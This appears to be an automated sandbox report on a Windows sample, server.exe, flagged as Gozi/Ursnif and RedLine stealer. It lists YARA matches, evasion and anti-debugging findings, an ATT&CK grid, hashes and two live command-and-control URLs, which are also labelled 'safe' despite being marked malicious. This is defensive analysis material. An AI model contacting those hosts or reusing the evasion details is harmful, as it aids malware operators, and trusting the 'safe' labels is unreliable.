      Source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.565392988.0000000000620000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00412E5E0_2_00412E5E
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004129C90_2_004129C9
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004135CE0_2_004135CE
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004131FC0_2_004131FC
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004139B60_2_004139B6
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_005716DF0_2_005716DF
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0057832C0_2_0057832C
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00571D8A0_2_00571D8A
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0057421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_0057421F
      Source: server.exeReversingLabs: Detection: 35%
      Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0057831B push ecx; ret 0_2_0057832B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00577F30 push ecx; ret 0_2_00577F39
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: Yara matchFile source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
      Source: C:\Users\user\Desktop\server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Users\user\Desktop\server.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C7F
      Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_004118DB
      Source: C:\Users\user\Desktop\server.exeCode function: __crtGetLocaleInfoA_stat,0_2_004154FA
      Source: C:\Users\user\Desktop\server.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,0_2_0041089B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00573BD3 cpuid 0_2_00573BD3
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00573BD3 GetUserNameW,GetUserNameW,HeapFree,HeapFree,0_2_00573BD3

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000003.440615758.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440588447.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440654861.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440692855.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440673519.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440532933.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440562879.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.565622070.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.440706160.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3396, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      Path InterceptionPath Interception1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts13
      Native API
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
      Software Packing
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Account Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      System Owner/User Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
      Remote System Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync124
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      server.exe36%ReversingLabsWin32.Trojan.Generic
      server.exe100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      0.2.server.exe.570000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://62.173.142.51/drew/LtSfNQUl38_2FDY/ZDiSMzVFZT8P12cRCR/wFifr57eD/E3QMnm3R09oCMKEqF_2B/hL6JR5JZ5RzfthDXDEL/QXKRNOEf5KUe4lOcOOnAWe/S7o7DbUVctcaA/rpMZ8DLG/JY7e7d4k8lkZ3XBI4AKdEOg/JVfUtdkUf4/lNi_2BCjIiDW9oaJC/JQY6K3BrLDok/oxD2Jl0W61e/9srw8Wtoy2vC2X/zMM4BIJQlabgMVrliSBbF/6bQOsnbMJ830WmQE/8fSuWxKUlXv_2FI/uixxrgswLUL3BF62nt/g_2FwBw.jlk0%Avira URL Cloudsafe
      http://94.1030%Avira URL Cloudsafe
      http://94.103.183.153/drew/45gwNn56tT_2B9DMppZLO6W/TY9yvuDrMO/NH6qQboGYLppgh3VY/fD0WTQxe_2Fc/8f_2F5pvK0k/5pc3M5q5_2FYt3/4jI4o0hOzWp0EtrTpDvY_/2BQflNotHm9IIPtO/mq9Dn1qgGdHgrmy/Xs1KDbSG454LVnULzq/seDw5rP1a/cxTqaNB2y_2FVHNjeaDU/t9me_2FSk8oJCJKH9Zx/OgVVwZaLyIQ6GcJMvVJZLX/3Iqej_2B4U8Se/qkLHdDp4/xkbU42A8qDuBydy0uePKn7_/2FGqiSuVoF/gyerokGYzhvdYj/f.jlk0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://62.173.142.51/drew/LtSfNQUl38_2FDY/ZDiSMzVFZT8P12cRCR/wFifr57eD/E3QMnm3R09oCMKEqF_2B/hL6JR5JZ5RzfthDXDEL/QXKRNOEf5KUe4lOcOOnAWe/S7o7DbUVctcaA/rpMZ8DLG/JY7e7d4k8lkZ3XBI4AKdEOg/JVfUtdkUf4/lNi_2BCjIiDW9oaJC/JQY6K3BrLDok/oxD2Jl0W61e/9srw8Wtoy2vC2X/zMM4BIJQlabgMVrliSBbF/6bQOsnbMJ830WmQE/8fSuWxKUlXv_2FI/uixxrgswLUL3BF62nt/g_2FwBw.jlktrue
        • Avira URL Cloud: safe
        unknown
        http://94.103.183.153/drew/45gwNn56tT_2B9DMppZLO6W/TY9yvuDrMO/NH6qQboGYLppgh3VY/fD0WTQxe_2Fc/8f_2F5pvK0k/5pc3M5q5_2FYt3/4jI4o0hOzWp0EtrTpDvY_/2BQflNotHm9IIPtO/mq9Dn1qgGdHgrmy/Xs1KDbSG454LVnULzq/seDw5rP1a/cxTqaNB2y_2FVHNjeaDU/t9me_2FSk8oJCJKH9Zx/OgVVwZaLyIQ6GcJMvVJZLX/3Iqej_2B4U8Se/qkLHdDp4/xkbU42A8qDuBydy0uePKn7_/2FGqiSuVoF/gyerokGYzhvdYj/f.jlktrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.103server.exe, 00000000.00000002.565488240.000000000233C000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        62.173.142.51
        unknownRussian Federation
        34300SPACENET-ASInternetServiceProviderRUtrue
        94.103.183.153
        unknownRussian Federation
        197390RATELE-ASRUtrue
        Joe Sandbox Version:37.0.0 Beryl
        Analysis ID:826050
        Start date and time:2023-03-14 09:24:08 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 41s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:5
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:server.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@1/2
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 4.7% (good quality ratio 4.7%)
        • Quality average: 89%
        • Quality standard deviation: 15.4%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 38
        • Number of non-executed functions: 29
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: server.exe
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        62.173.142.51server.exeGet hashmaliciousUrsnifBrowse
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          SPACENET-ASInternetServiceProviderRUserver.exeGet hashmaliciousUrsnifBrowse
          • 62.173.142.51
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.236
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.141.36
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.138.6
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          server.exeGet hashmaliciousUrsnifBrowse
          • 62.173.140.103
          No context
          No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.816297179835972
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:server.exe
          File size:239104
          MD5:0a7efdf643e54621fe9b9e5a29c06faf
          SHA1:0db17d1fcb4464120a6f3b088693f7b370fd0153
          SHA256:8cfad47521642927f7ab5f7401445393ab916fe2f67072b44cadfa89c11a40fe
          SHA512:11ddf0f3a432ab56e0d02804e3191b9fda38f135f59aae35328c32ebd28ed73073d3e196906063fb105b73916e64c919ac45be2c32b09f1feef113a39571dcb3
          SSDEEP:3072:HlrxsoA0q2uvNzapNaCik4A5RIiUDzmk5lLLBqc8KrOdNcJWrJGHG/Ni:IoXqNN+pIV4RhUNnvrOI0rJSqN
          TLSH:69348D1372D0A471E6724A31BE1BC2F4661FFCA58F5966E723986A2F1D711E1CE36302
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L.....\b...........................
          Icon Hash:ba821212818aa292
          Entrypoint:0x409761
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:TERMINAL_SERVER_AWARE
          Time Stamp:0x625CE5AC [Mon Apr 18 04:14:36 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:ae274c29ca15928cb1e23f2e712ba155
          Instruction
          call 00007FC3FCE3223Eh
          jmp 00007FC3FCE2BC5Eh
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          test eax, eax
          je 00007FC3FCE2BDE4h
          sub eax, 08h
          cmp dword ptr [eax], 0000DDDDh
          jne 00007FC3FCE2BDD9h
          push eax
          call 00007FC3FCE2B3F7h
          pop ecx
          pop ebp
          ret
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          push esi
          mov esi, ecx
          mov byte ptr [esi+0Ch], 00000000h
          test eax, eax
          jne 00007FC3FCE2BE35h
          call 00007FC3FCE2EDADh
          mov dword ptr [esi+08h], eax
          mov ecx, dword ptr [eax+6Ch]
          mov dword ptr [esi], ecx
          mov ecx, dword ptr [eax+68h]
          mov dword ptr [esi+04h], ecx
          mov ecx, dword ptr [esi]
          cmp ecx, dword ptr [0042D2A0h]
          je 00007FC3FCE2BDE4h
          mov ecx, dword ptr [0042D058h]
          test dword ptr [eax+70h], ecx
          jne 00007FC3FCE2BDD9h
          call 00007FC3FCE32C18h
          mov dword ptr [esi], eax
          mov eax, dword ptr [esi+04h]
          cmp eax, dword ptr [0042CF60h]
          je 00007FC3FCE2BDE8h
          mov eax, dword ptr [esi+08h]
          mov ecx, dword ptr [0042D058h]
          test dword ptr [eax+70h], ecx
          jne 00007FC3FCE2BDDAh
          call 00007FC3FCE32477h
          mov dword ptr [esi+04h], eax
          mov eax, dword ptr [esi+08h]
          test byte ptr [eax+70h], 00000002h
          jne 00007FC3FCE2BDE6h
          or dword ptr [eax+70h], 02h
          mov byte ptr [esi+0Ch], 00000001h
          jmp 00007FC3FCE2BDDCh
          mov ecx, dword ptr [eax]
          mov dword ptr [esi], ecx
          mov eax, dword ptr [eax+04h]
          mov dword ptr [esi+04h], eax
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          mov edi, edi
          push ebp
          mov ebp, esp
          sub esp, 10h
          mov eax, dword ptr [0042C868h]
          xor eax, ebp
          mov dword ptr [ebp-04h], eax
          mov edx, dword ptr [ebp+18h]
          push ebx
          Programming Language:
          • [ASM] VS2010 build 30319
          • [ C ] VS2010 build 30319
          • [IMP] VS2008 SP1 build 30729
          • [C++] VS2010 build 30319
          • [RES] VS2010 build 30319
          • [LNK] VS2010 build 30319
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x18f6c0x78.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000xdd08.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
